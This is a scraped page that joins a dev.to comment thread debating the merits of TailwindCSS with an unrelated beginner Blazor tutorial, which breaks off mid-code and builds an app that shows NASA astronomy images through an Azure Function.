think about what he was saying before plowing ahead. The answer to virtually all of your complaints is extracted components. Let's address your complaints one by one though: It's WET, not DRY. Not if you use extracted components. You have a wrapper class you like to use a million times? Great. Extract it! Then you only have to edit it once to update everywhere. Still DRY my dude. HTML should only concern itself with the structure of your page, not the styling of the page. These are inextricably linked though. Ever use a modifier class to change how your component appears? Where is that going? In your HTML. Know what modifier classes are eerily similar to? Utility classes. For example: need to stop page scrolling when a modal is open? Rather than writing a new class to do that, just use the overflow-hiddenclass already at your disposal. It's hard to read. I totally agree! ...So use extracted components. Now you can write your html with a simple class like card, and then go to town in your CSS with: You lose a lot of the features built into standard CSS Not true. Again, use extracted components. It solves a problem that doesn't exist At this point it should be obvious the problem it's solving, but just to clarify: it makes writing CSS easier and modifying your components in a logical way. Meaning, less time writing out individual css properties and values. You want to see an obvious problem it solves? I want a box to fill it's container, according to you I should just write plain CSS like so: 5 lines of CSS I have to write or copy/paste from somewhere. And if I want to update the positioning to be 1remin on each side? Now I have to update 4 lines individually. Not with extracted components: If you want better than CSS, there are already solutions. All of the solutions you mentioned don't make writing CSS any easier. You mention CSS-in-JS solutions, but that goes against your argument that styling shouldn't be in your HTML and you mention BEM/SMACSS but that's just a writing convention. It literally provides no value, and tons of problems. There is massive value in efficiency. If you want to write code faster and keep your stylesheets lean, there is plenty of value in something like Tailwind. And I say this as someone who up until 6 months ago, refused to try out utility classes for similar hesitations. But instead of writing a big long post about why I think it's useless, I gave it a try and found a way to fit it into my workflow in a way that has allowed me to speed up my development time and still create accessible codebases for new developers (extracted components still live alongside regular CSS). BONUS: nowhere did you mention the treeshaking capabilities of tailwind. If you're managing large-scale sites with massive style guides and you care about bundlesize, that alone is a benefit of Tailwind that I'd find it hard for anyone to argue against. As an aside: Personally, I don't love when people use a platform like this, where lots of newcomers to our industry frequently look to for answers, voice an ~opinion~ that borders on condescension about something that they don't seem to fully understand. It's ok to have an opinion, or prefer different tools, but if you don't like something or don't understand the value, you don't need to pull a Tucker Carlson (???) response to it. Yes, I've worked places where we do this. But I've also worked places where we use Bootstrap, and they're both bad ideas as far as I'm concerned. I don't think we should use modifier classes. Who said anything about Bootstrap? I'm also very curious what you're doing instead of using modifier classes to style variants. Are you just writing inline styles? Duplicating other class styles to create a new class just to avoid this? I guess everything else I pointed out you don't feel like addressing? It's pretty clear to me that you aren't interested in wavering from your original "opinion" here. Best of luck navigating this industry with that mentality. I did, me. What I'm saying is that I've worked places where we've used Bootstrap, which uses modifier classes and does basically all the things people criticise about Tailwind. Just because I've worked somewhere that does it a particular way, and where I go along with it because it's my job, doesn't mean I approve of something. So yes, I have and still do use modifier classes, and no I don't think they're the right approach. Writing semantic HTML. Where there's an absolute client requirement to do something non-semantic, then adding classes beyond the semantic, but pushing back against it. Everything else you pointed out was something I (mostly) agreed with. I love tailwind. I love the absolute tiny css file that goes along with it (when purged). I love that my boss will not mess up the rest of the site by editing a css style for his pet project page. I love not having to invent names for css classes. I love extracting tailwind classes to re-usable components. You have bigger problems than I can deal with here. I suppose in some cases, tailwind would be an improvement if your boss can go in and edit your company's css file for a project page. But then we're not exactly talking about best practices, are we? You can replace the word "boss" with "others". Still doesn't change the problem. It seems like the problem is one of scoping, and tooling though, now that you mention it. First, it seems like you're editing a global .css file. Now, whether it's SCSS, CSS Modules w/ a bundler (Webpack? Rollup?) it's... rare these days for there to be one universal CSS file precisely because web development has gotten much more complex. The output might be a single CSS file - that's the point of a bundler after all - but the input shouldn't be. One of the key things you can do with CSS (and it's even easier in SCSS) is to introduce scoping. So, let's say that you have a pet page. All you have to do is, in the root of that pet page (whether it'sor or whatever...) is add ) You can then write styles that apply only to that pet page. It's even easier in SCSS This is the power of CSS Combinators, one of the things you lose with Tailwind. Sorry, I guess I should have been clearer. I understand scoping, components and most modern css best practices. I used to do agonize over all that with sass/less/postcss - code splitting across files where it made sense, components, namespace scoping, BEM and other methodology experiments. All with some form of build using npm/gulp/grunt/bundlers/etc. Now we just tailwind and don't really need the other stuff. It works great for our team. It's sort of ironic that the site this is posted on took inspiration from Tailwind in our own approach to CSS! It's entirely possible that was actually me. I produce a potent musk. I respectfully disagree! Personally, Tailwind solves a lot of problems for me. For one thing: CSS is magic and I refuse to listen to anyone that thinks they can explain it to me because I might get hexed in the process. A tool like Tailwind keeps me safe from the dark arts (this is why I always burn sage when talking to @pp ). More generally, I think critiquing Open Source tools for their issues is fair (especially if those critiques are attached to a PR!), but we also have to be mindful of the limits of our own perspective. As a CSS or front-end expert with a team of engineers to back you up, Tailwind might not be the best choice, but that doesn't describe all of us. When I build a landing page for a charity organization (I'm not billing, I can't handcraft all the CSS for this thing), I'm definitely using Tailwind or something quite similar. Tailwind is a great solution for those solo indie hackers out there; it improves productivity and abstracts a source of complexity that not everyone has the time or aptitude to dive into! Another way to phrase it: more or less these points would also apply to Rails or Laravel, but those frameworks solve a lot of problems. I'm not sure anyone wants to replace CSS with Tailwind! That sure is some all-or-nothing thinking (I learned about that in therapy, hell yeah)! You use the example of Assembly and C, but I think this is more like C and Ruby; I'm not a C developer, as much as I try to learn about it, but I can build some pretty cool stuff really quickly with Ruby. Of course, the stuff I build in Ruby is going to have some weaknesses for having used that abstraction, but if I didn't use Ruby I probably wouldn't ever get the code to compile anyway. However, I can go ask some friends who know C or Rust or something similar to extend my Ruby code when it really needs that performance boost! Maybe one day, I'll have to re-write my Ruby, but that's a problem for millionaire Jacob. He has more users and paying customers than his little Ruby app can handle. Tailwind doesn't stop you from cracking out that hellish CSS abomination whenever you want! When my Tailwind implementation makes something difficult I'll hire a warlock to summon whatever void-being we need to fix my layout. While we disagree, I'm glad we can have a discussion about it. Maybe you're right; if people find this article searching for more context around Tailwind, they will find a lot of opinions (and the strong stench that comes with a multitude of opinions). However, for now, I think the enlightened 21st-century philosopher-king Jason Mraz penned it more directly than I can every hope to: "You do you and I'll do me." I started writing CSS for money in the year 2000. I am very familiar with CSS and all the different ways you can use it, LESS/SASS/BEM/SMACSS, etc. Tailwind provides a lot of value and solves tons of problems for me. I've been using it for about a year on a large Vue project. It's been really great. You can always supplement it with hand-written CSS. Sure it introduces some problems (like anything else), but the benefits far outweigh the cons. Oh boy did you get some reactions to the post.. I totally haven't read all the comments so I might just rephrase some other comments in my own words and maybe add my own two cents while I'm at it. First of, don't use apply. Don't. I'd deny any pull request using @apply. Horrible feature. Yuck. From skimming through the comments I didn't see the point of standardization though. You can ignore all extra work of making sure all your devs in your team use the same kind of class-namings. To BEM or not to BEM, all these decisions go out the window, reducing extra time needed in planning that is better used to actually get to work. The example you have in your section "It's hard to read": How are they any different if you put the code into a component? All tailwind really helps me with is to not get fuzzy and build my own broken diy-css-framework over the time. It stops me from doing stupid things like getting into the habit of writing bootstrap-esque classes á la .card .card-title .card-bodyand so on. Instead of writing several classes myself now I write more components and think about making my project more modular, increasing reusability while maintaining a single source of truth. Now you might say "but I can have a source of truth too in my .css file". Sure. But why would I go through all the hassle and time to slowly write all the css classes myself that are literally right there from the get-go? Convenience and maybe a good portion of laziness? Yup, absolutely. I'd probably just don't use it if there is some crazy specific task from a client where you can see right away that you're going to rewrite 90% of the tailwind config anyways. Overall it's just crazy fast to get websites done with tailwind while staying consistent in your markup, especially in prototyping stages. So all that's left is probably to look at it by a case by case scenario and decide what tool to pick for the job. As always. I agree. Not that I don't think you shouldn't bundle related CSS properties together into reusable classes, but that the whole point of Tailwind is to avoid that type of composition altogether. I may not agree with Tailwind's philosophy, but I don't mind pointing out as part of it's criticism when it's being philosophically inconsistant. Weirdly, "making sure all devs use the same class namings" is not really a concern that I have. I mean sure, it's a good thing to aim for, but it's only really a "must have" if you're using an unscoped global .css file for styling. Most of the work I've done has been in Vue or React; which means I'm either using Vue's <style lang="scss" scoped>, CSS Modules: "import 'myComponentStyle.scss", or CSS-in-JS: "const myComponentCSS = css \" (which probably won't show up right because of markdown not interpreting backticks I suppose if your team is operating on one big global .css file (instead of using CSS modules or CSS-in-JS) you have to make sure it is using the same naming conventions. But for the most part, it's more important to me that class names are unique and descriptive of content rather than follow a certain format, so that they can be easily searched for in the source code of the finished HTML (for debugging) or understood by the rest of the developers on the team. One of the patterns I'm seeing is that people who really seem to like Tailwind point out how much more useful it is than CSS, and don't seem to have a whole lot of experience or willingness to try CSS-in-JS or pre-processor (SCSS) solutions. I have no problem with utility classes, used sparingly. Ideally I'd prefer SCSS mixins or resuable CSS-in-JS code compared to them, but what's wrong with that? This is a compelling argument for a framework like Bootstrap, but not one like Tailwind. One of the problems I have with tailwind is how many of it's classes - something like 99% -- though I haven't done the actual math, I'm pretty sure that's the right ballpark, give or take 1% -- are just one or two lines of CSS. "p-8" is just "padding: 1.5rem;". "rounded-full" is just "border-radius: 9999px". I did go through and identify about nine tailwind classes (out of how many hundreds?) that DO actually provide some convenience and am rewriting them in my own utility class library. By all means, prototype away, but I wouldn't recommend it if you're dealing with end products meant to be delivered to the product owner. I honestly don't use it as much as my text might suggest but I can see the appeal and tried to find some points to make you maybe see them from a different point of view :D This caught my eye because I honestly never worked in a situation where I hand over code to another owner and I mostly work on internal products. The rare SaaS things I worked on were in good ol' SCSS though. What would be interesting to see is the type of projects people work on using Tailwind. Is it a lot more agency-type of projects, internal sites (as in admin tools) or SaaS? Bootstrap and Material Design are also both utter messes of applying way too many tags to way too many elements. I prefer to write my own cleaner more terse styles. Tailwind just is even worse but I haven't had to use it thankfully. With this kind of overelaborate markup the stylesheet turns into a gawdawful warring mess of !important and even worse ng-deep messing up other devs pages especially because the backend devs that big companies tend to hire to do front end work seem to be incapable of using their own elements, creating simple reusable styles, or cloning well done markup from other pages and think that building a page is sort of like assembling tinkertoys without having to concern themselves at all with the messy art of design. If you're non-stop appending classes to get what you want, then sure, it can be a bit messy. I've found Bootstrap + a small amount of custom css with @extend to be great. I started making sites like that in 2012 and haven't looked back. Rebranding is super easy just by changing some variables and fonts. In my last project idiot devs were using Bootstrap and Material design tags for different purposes on every page. It would have been better for the project if someone that actually knew what they were doing had written simpler styles and templates for all the common elements and they were almost always overriding things with the stylesheet many times with inline styles for all the framework items they were misusing. Every single page had elements common to other pages that were laid out differently and badly. I was the only one in the entire project that was writing comprehensive reusable styles and using for loops for repeated elements and I was making some headway in that the clients were liking my pages and not so much the dreck they were doing, but I got fed up about the massive unpaid overtime and took a different job. I still think bootstrap and Material design are barking up the wrong tree. They are too complex. As an example I just started a project in VueJS 3. I needed controls so my first library that I tried had utterly beautiful looking controls but when I installed it the compiler warned me that it was making my bundles too big. And looking further it was a big camel designed to get its nose into your tent and then force you to pay $900 per developer to use a designer tool they wrote to handle the massive complexity of the whole thing. I found a open source implementation of the multiselect I needed written in native Vue, with maybe 80 simply named css styles only 8k gzipped, easy to modify without a tool, which is the right way to build things. Any framework can be abused or misused through laziness/ignorance. I think plain CSS is actually the most susceptible to abuse. Freehand tools are the most flexible but with no standard laid out, most people will just end up making a huge mess over time. I understand the argument that Bootstrap is heavy but it's only JQuery that makes it heavy and BS5 will get rid of that. If a project doesn't need a component, just don't include it. Perhaps I have heart shapes glasses because I prefer a standardized look and feel over something unique but I'm going to keep reaching for standard libraries that let me get a front-end done in days instead of weeks. I still think Bootstrap is a stunningly awful POS. I have been forced to use it on three projects now, loathe it. I can write my own stylesheets way better. There are a few good ideas in there, such as the font icons, but the whole idea of putting ten tags on every element and the idiotically meaningless names of the grid controls can just go somewhere the sun doesn't shine. It doesn't save you time, it makes things harder. I create my own standardized look and feel. All of the projects where I loathed Bootstrap were using modern frameworks. It has nothing to do with jQuery, it has to do with the terrible metaphors Bootstrap uses. Strong words. You aren't forced to use 10 classes everywhere. You could come up with one class which extends those 10 classes and then use one repeatable class, same as any compiled CSS. I think of BS and all the other frameworks as just time-saving utility and for me it's always done a good job of that. I don't honestly know how it could possibly make things harder unless your always overriding it, which is a miss-use. I wasn't the one overriding it. But the stylesheet was a mess of overrides nevertheless. I've never seen anyone compile the Bootstrap classes into one class, they were using them everywhere with multiple classes on every object. The problem is that it becomes very difficult to see where some unwanted style attribute comes from. I also don't even want to understand how the grid classes work, because the names don't make any sense whatsoever. What I really can't stand is how large companies hire back end developers that think that using a CSS library like this is a substitute for actually writing a well conceived ui. They pile on the various containers and objects and get something hugely inconsistent with layout anywhere else. I have written very large applications, and I didn't need a third party library to do it. I have in the past copied just the bootstrap style icons into a project but not used anything else from it. It's a style of markup I strongly disagree with. Immense thank you, @brianboyko ! So glad articles like these start to be written, providing simple and precise explanation of what is wrong with Tailwind. My personal a-ha moment came after inheriting a project with it. It was supposed to be a no-brainer, after all you don't have to learn someone else's home-made CSS framework with Tailwind (they say)! Yeah, lg:pl-12 lg:pr-6 -mt-1 lg:mt-0, give me home-made CSS frameworks any time instead of this mess. I've been writing CSS since 2000. I love the way tailwind works. It's especially nice for modern website development. An agency owner I collaborate with just mentioned that he appreciates it because it unifies the frontend style of a website while allowing junior developers very strong documentation on the style guidelines. Everyone out there reading this that loves TailwindCSS checkout TailwindUI! I've been using the newly released React Components on my Gatsby websites and it's awesome. Super seamless, super optimized, and it's very fast to build out components. Lets wrap this discussion I am not sorry to this guy cause everything has its pros and cons but this guy could not provide rational argument in most cases. Why do we use framework because it eases our lives we could have just used Vanilla Javascript. Tailwind should be compared with Bulma Bootstrap and not with saas which i believe is a mess too and not a css framework and some like it. While Tailwind has some cons it is definitely solving problems for many and many are buying premium version I even dont own one. The way he bashed Tailwind we can also bash React Vue Angular and everything that exists. But if someone is using it let them use it rather than spreading negative judgements. This post was like begging people to not use Tailwind with mostly irrational arguments and most people who agreed I believe never made a full project with tailwind I understand they have their own preference . In return this post just gained negative publicity which at times is good for a brand. Bottomline nor people who need to use Tailwind are not gonna stop and neither the guy will provide an alternative solution. But if you ever bash a technology mention a few good sides and atleast have minimum respect to people using it. I am not replying anyone to this comment and I have deleted all my comments previously. Remember onething dont always see the world through your eyes a product might seem bad to you but its provides solution to others and people are making money. Everyone stay fine stay safe tc. This is a bullshit title. Constructive criticism and OPINIONS is one thing, but the entire premise here is based on taking an extreme, disrespectful stance. I find it extremely beneficial to use Tailwind for a number of reasons as do many other devs. Mind you, I'm not 'defending myself,' as there's really nothing to defend. I am pointing out that a post with this type of title is barely worthy of a skim. Bullshit title. I wouldn't call it bullshit. Clickbaity, maybe. Well "does nothing" is absolutely untrue, for starters, I don't think we need to debate that. "Adds complexity" heavily depends on your use-case. To give you an example: writing a component library is very, very efficient, without any increased complexity whatsoever. @brianboyko thank you so much for writing this article -- especially the part where you talk about why you wrote it. Additionally, while most folks won't read through all the comments, it shows an incredible level of dedication when an author takes time to read (not skim) comments and provide thoughtful responses. Apologies in advance for this very cynical and bleak perspective.... While most of your article focused on technical reasons why Tailwind would not be a wise choice for most projects, I thought it might be helpful to at least call out why Tailwind is so popular in the first case: a lot of developers don't really know CSS, and they don't really care. Tailwind promises to make CSS more accessible for those developers. Unfortunately, I think a lot of your points above (which resonate with me, someone who knows CSS) just don't make sense to developers that have no strong desire to become proficient with CSS. Why would these folks care that @applyisn't in the CSS standard? They're told to use it by the Tailwind documentation and that's really all that matters. You make a great point about not being able to use combinators, but (really) who among these developers were ever going to use combinators anyway? Let's be honest: Tailwind is for developers that don't know and don't care to know CSS. Tailwind is for developers that want to pretend they use CSS. This is very similar to the extreme dependency on a grid system for layout when CSS Grid exists, is infinitely more powerful, and can be picked up in a weekend of study. Call it laziness, willful ignorance, or mediocrity, but Tailwind is popular and will probably remain so as long as developers don't want to do the work of learning CSS. Great take Mark. Had a good chuckle! Your perspective is neither cynical or bleak, but it is incredibly condescending and presumptuous, even more so than @brianboyko 's very condescending and presumptuous piece, so props on upping the bar! 🎊 I do know CSS and I also absolutely hate reading it. The reason I love Tailwind is that everyone writes CSS differently and with Tailwind you can’t do that. No more reading through an inscrutable CSS file, flipping back and forth from the HTML to figure out what the hell it’s actually doing. People don’t like Tailwind because they’re ignorant of CSS, they like it because in many cases it’s a better experience for both writing and reading it. Having read the article, I disagree with some of the statements and find others to be factually inaccurate. Things I disagree with are mostly summed up in this part: "If you choose Tailwind for a mission critical application, you will end up making your job harder, your application more brittle, and your team, in the long-term, will suffer." I have not (anecdotally) found this to be the case. I maintain many applications that use vanilla CSS, many that use styled components + react, a few that use SCSS, and many that use Tailwind. I have not found apps that use Tailwind to be more brittle or cause me or anyone else in my teams to suffer. I do not see any evidence to support this statement. This that are factually inaccurate: You're getting a lot of pushback here but I completely agree with you. It's pretty baffling to me how popular it is, but I LIKE CSS so maybe that's the difference. Not trying to throw shade but many of the people I see favoring Tailwind admit that they're bad at CSS or actively hate it. At this point I know CSS very well so it seems like much more work to fiddle with abstracted utility classes and learn the "Tailwind way" of doing something, rather than the CSS way...which I know isn't going anywhere and has standards. Oh, and there's a lot to hate about CSS. The standard names can indeed be confusing. Dealing with priority -- i.e., what styles overwrite other styles -- can be problematic as well. In the original spec, there was no support for variables, which made it impossible to reuse code from class to class, and even today there isn't support for functions. And yet, we continue to use it -- and our dependency on it grows, because while nobody likes the CSS standard, nobody can agree on anything that can replace it. The best we have are tools that transpile to CSS. This is why I really do think that something like native support for SCSS files should be a priority of whatever muckety mucks are in charge of WebKit. But then again... I don't see that happening anytime soon when the existing solutions are good enough. I was about to write a piece like this (and I might do it anyways!). But I totally agree on the "does not solve problems it claims to" part. They claim to solve the naming problem, only to delegate it to single file components… where style is scoped so you don't need naming anyways. And I would be super concerned about maintaining it. Built of speed no doubt. But I moved away from bootstrap utility classes when I had to change some margins—but not all. Now why was this one m-4? Should I change it to m-3? 😎 never used tailwind because like every other flash in the pan including my own flash in the pan inventions, I always go back to Sass or Sass like things, because that's what I saw first. It's like the baby duck 🦆 sees it's mom 🦃, you only get one first impression and that's the one that sticks. I've been coding HTML since the mid-90s. If I felt that way about everything I'd still be using <table>tags. "but you should, youl like it" to which I say, I like ducks I say if you don't like it, don't use it. If you like it, use it. Not everyone loves React, some Vue. Some vanillaJS. I use to use my own rolled up CSS. Then bootstrap with my own stuff. Then later I used Foundation and my own CSS. Personally, I like Tailwinds. Use what works for you and your team today and hopefully later in the future. And btw, I was one of those early 90s guys that started developing when Netscape 2.0 was so AMAZING (it was) and later used tables (HATED IT), so most of the stuff today is GOLD! As personal developers, you should work with the tech stack that you like. As professional developers, we rarely get that option until we're at the level where we're making architecture decisions for the team. What I'm saying is: Even if you personally like Tailwind, you need to know how your decisions will affect the product and your team. The point of these criticisms of Tailwind (and other similar criticisms of other tech (Why Does PHP Suck is always a fun read), is that when we criticise these technologies harshly, we are explaining not why we don't like it but why team leaders and architects shouldn't choose this tech for their stack. For example, I don't like Java, but I can't make a compelling case to never use Java in enterprise applications. I really like Deno, but I can't make a compelling case to move our Node-based production over to the new platform. It's not about preference, it's about profession. Or more bluntly: As a professional developer, when we switched all of our new projects to Tailwind, everything got easier and more efficient for us. We don’t have time or resources to implement some ridiculously verbose CSS methodology like BEM. You’re effectively just saying “you shouldn’t use this because I say so” and frankly you sound like a clown to me. What about if you're using Tailwind with some framework like React when you're building components and use Tailwind in those components? I mean, instead of replacing 123 occurrences 'blue-color' you just replace it in one place, in the button component. After all, is Tailwind just a replacer for simplifying CSS? I'm not defending Tailwind. I know what it is, but I've never use it. Thank you for your article (like you see from other comments [still valuable] it's controversial) but while I was reading I wondered if all disadvantages described in the article are in context of web development without frameworks like react? Because Tailwind with React could be just a replacer for more difficult CSS? How far down do you go with turning things into components though? For example, imagine creating a very simple alert modal component. This contains a message, and a button. Now, I've done this exact thing, and the button is just an HTML <button>. I could embed a button component into it instead to mitigate the problems of Tailwind, but that seems like it's going too far in the direction of breaking things into the smallest possible parts. There's a point at which something becomes too small to separate out into it's own component/class/modules/etc. There's a balance between making the code readable and logical, and also ensuring that it's comprehensible by the human who is managing it. Should the modal text be its own component too, as it contains styles very specific to a modal. It needs to be re-used across all of the other modals (prompts, confirmations, password queries, etc), and we want to avoid the need to be making multiple find/replace changes that Tailwind might force us to make otherwise. Tailwind would allow us to do this in a more sensible manner, but it's not generally how TW projects appear to be done the majority of the time (going from the numerous articles and code examples in Git repos), and it's something that was already very much possible in vanilla CSS, let alone the many pre and post-processors for CSS that have existed and been in use for many, many years successfully. That is a good point, and in theory, that could work. I don't think that when the rubber hits the road, though, it will. A really well organized React/Vue project will probably be like that. You have a roughly 1-to-1 ratio of "components" to "css classes". You style only in "dumb components" (i.e., stateless, takes only props), and if it's not "one className entry per component", it's at least really close. It eliminates many of the problems I've pointed out about code-reuse, and having to change class names in multiple places. But it doesn't eliminate the problems with debugging. If you try to inspect an element in the browser - that is, after it's no longer a component, and now lives as part of the DOM, you can't really identify what the component is by class anymore. It makes it harder to identify the root cause of the bug, which increases the Mean Time To Repair. It also doesn't eliminate the problems with having to learn new Tailwind syntax, with prioritization (if you were to give an element "h-12 h-8", or "h-8 h-12" which height would apply first... and how would you know unless you looked at Tailwind's sourcecode to see what got defined last?) And it certainly doesn't account for the scenario when the React or Vue app you're working with doesn't have a very "atomic/molecular/organism" structure at all - but is a mishmash of big components, small components, components that depend on Vuex, components that have props reassigned to internal state which on-change run a callback prop... (Ugh!) What I do think might be useful is using something like the Twind library to rapidly prototype what you want your final CSS to look like, but then taking the CSS outputted by Twind, copying it from the browser inspection, and plopping it right back in to something more long-term like emotion/css. One of the biggest benefits of using tailwind is constraining styling to a set of pre-defined utility classes to follow a design system, and (almost) automatically have a consistent UI in terms of colors, spacing, etc. Not a single word about that in the blog post... The author sounds like they’ve never had to work with a set of design standards and just use Bootstrap or some other gross and inflexible framework for everything. That’s cool if you want to make an incredibly boring looking site. I’ve done the “override styles in Bootstrap to make it less ugly” dance before, and it sucks compared to using Tailwind or any other utility-first framework. This is amazing for big/enterprise applications Also did you give this post a read? I respect people who use it, but I think it is completely unnecessary and adds complexity on top of standard CSS without any convenience. You put a million inline-like classes on an element, then you either slam it into a component or try to move it to some SASS file. When in a SASS file, you then @apply not-so-configurable classes without any access to mixins, variables (both CSS or SCSS) etc. It makes no sense to me. I agree it's not readable at all. Styles and HTML are not separated anymore it's sad. And a question is to answer, which order for theses classes ? Not all developpers will order it in the same way... The people I know using tailwing are generally bad in CSS or too lazy to write it. Have a look to RSCSS -> class names will have a real utility again and HTML is READABLE ! While I agree with the overall sentiment; I’d like to add that tailwind is not as popular as it is without a good reason. I’ve used it myself before and I found that (at least when starting with a project), it makes it very easy to get something looking very modern and clean. I think the thing that makes people like it over eg inline styles is that yes, it’s “inline styles with extra steps”, but it’s also inline styles with prettier defaults. It can very quickly get you satisfying results. I'm not very adept with CSS yet I still agree with a lot of what's being said there, mainly how unmaintainable (and unreadable and just plain ugly) it makes your HTML if you use it how much of their docs suggest. The parts I like about it is that is pre-defines sizes for a bunch of things in rem( m-xetc), that's it's easy to make something responsive or darkmode or whatever modifier by just adding a prefix and the typography add-on (makes it incredibly easy to style generated HTML so it looks nice). So I just use those parts to make my own classes with a mix of @applyand regular css becuase it's no problem to mix that. You might actually be a good candidate for Tailwind, but not to use as intended. I make an argument that "if you use it this way" is not "if you use it as intended". What I'd suggest in your case is using it as "training wheels" to CSS. If there's something you can't figure out how to do in CSS, but you know how to do it in Tailwind, try using tailwind in your first draft to apply the styles you want, then go into your Chrome/Firefox element inspector to see how Tailwind's styles got translated to CSS, and replace the CSS. This actually seems like a really solid way to start getting better at CSS. Again, though, it's not used as intended. Wow, I was wondering if I should hop on the TailwindCSS bandwagon and came across this post at the right time . More than the article itself, enjoyed reading the back and forth between the developers in the comments section. This is such a healthy discussion I have seen in my career ! Thanks for writing this article. I felt that I was the odd one out who doesn't feel productive while using Tailwind. Glad to know that there are many. I prefer writing my own sass Oh no. You're not the only one. I agree with pretty much everything in this article yet I also find myself really liking the the naming conventions tailwind has used. For example, I find the media query prefixes to be very intuitive. I think the middle ground here is to use @applyall over the place despite tailwind's documentation recommending against it. All of those classes really make no sense. I fully agree. It makes, code ugly and I cannot imagine a case where this makes me faster. I have a few utility classes and a nice grid I made so I can change collums, padding and positioning while writing HTML und the real look is made in CSS. But yeah, people are using what they want. Not all are thinking that code should be minimal and nice.
https://dev.to/brianboyko/tailwindcss-adds-complexity-does-nothing-3hpn?ref=bestwebsite.gallery
CC-MAIN-2021-25
refinedweb
15,803
70.33
Blast! We’ll be building our site from the ground up with no Blazor experience required. All you’ll need is a passing knowledge of C# and .NET. If you don’t have that, no problem: brush up on some C# (I enjoy this Learn module) and come back when you’re ready. This post includes the following content. What is Blazor? If you’ve worked in the .NET ecosystem, it’s been hard to ignore the buzz around Blazor. If you’re new to Blazor or even .NET, a refresher is in order. Blazor is a front-end (UI) framework using a single-page application model. These days, think of JavaScript libraries like React or Vue. With Blazor, you can build interactive UIs using C#. You do this by building reusable components using C#, CSS, and HTML. For when you can’t use C#, like working with a browser’s local storage, JavaScript interopability is built in. (And if you truly are allergic to JavaScript, there’s several community projects that can help you–like Blazored.) Hosting models If you select a Blazor project template in Visual Studio, you’ll need to pick a hosting model. Blazor offers two hosting models: Blazor Web Assembly and Blazor Server. Blazor Web Assembly With Blazor Web Assembly—which we’ll be using in this project!—Blazor and its dependencies (including the .NET runtime!) are downloaded to the browser. The entire app executes on the browser UI thread. All app aseets, typically in wwwroot, are deployed as static files. If you look at the footer of your generated HTML, you’ll see it uses blazor.webassembly.js. This file initializes the app’s runtime after downloading the app and its dependencies. I’ve stolen borrowed this diagram from the Microsoft doc on the subject: The good - No required ASP.NET Core server or dependency on .NET server-side, meaning a serverless deployment scenario (like for this app!) is possible - Work is completely offloaded to the client - Docker support The not so good - The browser is your runtime, so I hope you like your browser - Download size is larger, so apps take much longer to load - Tooling support is not as great (but improving) Blazor Server With Blazor Server, your app executes on the server from an ASP.NET Core app. Any UI updates, JavaScript calls, and event handling, is handled over a persistent SignalR connection. I’ve once again stolen borrowed this diagram from the Microsoft doc on the subject: The good - Small download size and fast loading time - You get to leverage .NET Core APIs and tooling, and share models between the client and server - Docker support - You don’t have to worry about WebAssembly support (although this will be less a concern), or devices that don’t have a lot of resources to work with The not so good - High latency, since a network call is required for each interaction - An ASP.NET Core server is required - No offline support like Blazor Web Assembly We’ll learn much more about Blazor in great detail as we improve our application. So, what is this application? Keep reading for details. Blasting off with our project As written about previously, I’ve built an app called Blast Off With Blazor. You can see a live version at blastoffwithblazor.com and also clone the GitHub repository. When the application loads, it calls an Azure Function. The Function, in turn, calls NASA’s Astronomy Picture of the Day (APOD) API to get a picture that is out of this world—literally. The APOD site has been serving up amazing images daily since June 16, 1995. Every time you reload the app, I’ll fetch a random image anytime between that start date and today. Right now, it’s super simple and super slow. We’ll fix that in upcoming posts as we learn Blazor together. As we build on it, we’ll be using additional awesome NASA APIs as we learn all about … - CSS and JavaScript isolation - Data binding - Event handling - State management - Routing - Configuration - Testing - PWAs … and so on. For now, let’s look at the code. Our first code review I wanted to start with some basic functionality. Let’s look through what I set up for you. The API project Let’s first look at the Api project as, for now, it’s pretty simple. As I said earlier, we’re going to call the NASA APOD API. If you don’t pass a date to the API it’ll return the latest photo. I preferred to fetch a random one. So, in ImageGet.cs, I wrote a helper GetRandomDate() function. This returns a date between June 16, 1995 (when the API started) and today. private static string GetRandomDate() { var random = new Random(); var startDate = new DateTime(1995, 06, 16); var range = (DateTime.Today - startDate).Days; return startDate.AddDays(random.Next(range)).ToString("yyyy-MM-dd"); } Now that we have our date, we can work on our Azure Function. [FunctionName("ImageGet")] public static async Task<IActionResult> Run( [HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "image")] HttpRequest req, ILogger log) { log.LogInformation("Executing ImageOfDayGet."); var apiKey = Environment.GetEnvironmentVariable("ApiKey"); var response = await httpClient.GetAsync($"{apiKey}&hd=true&date={GetRandomDate()}"); var result = await response.Content.ReadAsStringAsync(); return new OkObjectResult(JsonConvert.DeserializeObject(result)); } There’s actually quite a bit going on in the method signature. We start with defining an HttpTrigger, which means it’ll execute when our app calls it. We pass in an AuthLevel of Anonymous, which means the consuming app doesn’t have to pass in a function-specific API key. The Route signifies we’ll only be using GET calls, and the Route of image defines the route template (it’ll respond to api/image calls). In the body of our method, we get our API key from our configuration and call the API—passing in our key and the date. We’ll also elect to receive HD images. Once we get a result back, we’ll deserialize it so we can pass it back to the caller. We’ll be focusing on Blazor, obviously, and not Azure Functions. This is probably the most we’ll get into Azure Functions in these posts. If you want to learn more about Azure Functions, have at it. The Blazor project If you navigate to the Client project, you’ll see just one page currently in the project, under the Pages directory: Index.razor. This .razor file is a component. In Blazor, a component is a “chunk” or “part” of the UI (like a form, page, or even something as simple as a button). In our case, the page is our component. Eventually, we’ll want to change this to make it more reusable. We’ll get there. These component files use Razor, a combination of C# and HTML. This is very similar to what’s implemented in ASP.NET MVC or Razor Pages. The route template The first thing you’ll see at the top of the page is this: @page "/" This @page attribute signifies a route template. In our case, the root of the app. That’s all we need to know for now, but it can get a lot more complicated: you can even apply multiple route templates for a component. The @code block Skipping down to the bottom of the file, you’ll see a @code block—this is where we’ll define our C# code to associate with our component. As we make more complex components, we can even move this code to separate C# classes. For now, let’s examine the @code block. private Data.Image image; In our Data project, we have the API model: public class Image { public string Title { get; set; } public string Copyright { get; set; } public DateTime Date { get; set; } public string Explanation { get; set; } public string Url { get; set; } public string HdUrl { get; set; } } More interestingly, we call OnInitializedAsync to fetch our image from the Azure Function: protected override async Task OnInitializedAsync() { image = await http.GetFromJsonAsync<Data.Image>("api/image"); } Wait, what is that http reference? That’s us injecting HttpClient, from the top of the file: @inject HttpClient http Much like a normal .NET Core app, you can use dependency injection to inject a service into a Razor component. The markup Next, you’ll see us use Razor syntax to render image properties onto the page. You’ll notice I check first if the image is null before rendering. The page will certainly load before the API call completes. In those cases, the page can error out if you don’t check for it. (I also saw that sometimes the API didn’t return a @if (image != null) { <div class="p-4"> <h1 class="text-6xl">@image.Title</h1> <p 